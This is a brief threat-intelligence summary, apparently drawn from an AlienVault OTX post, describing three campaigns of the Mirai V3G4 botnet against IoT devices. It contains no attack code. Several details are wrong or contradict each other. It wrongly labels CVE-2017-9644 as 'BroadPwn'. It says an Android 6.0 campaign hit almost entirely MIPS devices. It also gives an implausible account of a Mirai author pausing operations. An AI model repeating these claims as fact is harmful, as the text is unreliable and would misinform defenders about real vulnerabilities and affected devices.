Since July 2022, researchers have observed three campaigns utilizing the Mirai V3G4 variant. The threat actor exploited 13 vulnerabilities that could lead to remote code execution. Upon successful exploitation, the wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients.

The following are the attacks observed so far:

*1. The most recent campaign begun on September 4, at approximately 5:30 PM UTC. This operation targets devices that have a MIPS-based architectures and 66% of the discovered IoT devices were based on MIPS architecture. The vulnerability exploited is CVE-2017-9644, which is more commonly known as “BroadPwn”.

*2. On August 15, a campaign targeting devices using Android 6.0 and higher began but was interrupted at around 10:45 PM UTC by a Mirai author who temporarily suspended all activities due to an incident on the Mirai Control Panel server as they conducted an investigation. The malware samples used in this incident were signed using the same hardcoded private RSA key as other Mirai samples. This campaign had the largest footprint; over 5,000 vulnerable IoT devices were found and almost all of them have a MIPS-based architecture.

*3. On July 12-13, researchers observed a new attack campaign that appeared to be testing the Mirai codebase, with samples and payloads containing UTF-8 encoded characters. During this attack, the malware created a file containing a list of targets for subsequent attacks.

‍

Source: Mirai Variant V3G4 Targets IoT Devices - AlienVault - Open Threat Exchange